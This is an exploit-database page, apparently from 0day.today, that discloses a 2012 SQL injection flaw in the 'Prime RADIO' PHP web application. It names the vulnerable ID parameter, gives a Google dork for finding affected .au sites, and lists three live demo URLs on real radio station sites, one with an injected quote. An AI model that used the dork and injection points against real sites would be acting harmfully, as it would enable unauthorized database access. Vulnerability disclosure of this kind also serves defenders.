[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Prime RADIO SQL Injection Vulnerability

Author
Persia Security Group
Risk
[
Security Risk High
]
0day-ID
0day-ID-19304
Category
web applications
Date add
01-09-2012
Platform
php
============================================
Prime RADIO SQLi Vulnerability
============================================
# Exploit Title: Prime RADIO SQLi Vulnerability
# Author: Persia Security Group - (Prince & mafia1990)
# Date: 09/02/2012
# Vendor or Software Link: http://www.primeradio.com.au/
# Category: WebApp
# Version: All Version
# Contact: boy_of_persia_1990@yahoo.com
# Website: 1337day.com
# Greetings to: All members of Persia Security Group
# Tested on: CentOS 5.7,Ubuntu,Debian

########################################################################################
[Product Detail]

This website published for Radio Station
have SQLi vulnerability in param[ID]  && ==> .!..
Google Dork: intext:prime radio site:.au
Technology: PHP & Mysql

[Vulnerability]

SQL Injection:

    http://www.site.com/feature.php?Title=.!..&ID=175[SQLi]
    http://www.site.com/feature.php?ID=XX[SQLi]

Demo site:

http://www.radiozinc.com.au/cairns/promotion.php?Title=Sportsman%92s%20Lunch%20Terms%20and%20Conditions&ID=276
http://mix1063.com.au/feature.php?Title=106.3 Presents - The Butterfly Effect&ID=40
http://www.hot91.com.au/feature.php?ID=11%27



#  0day.today [2024-11-15]  #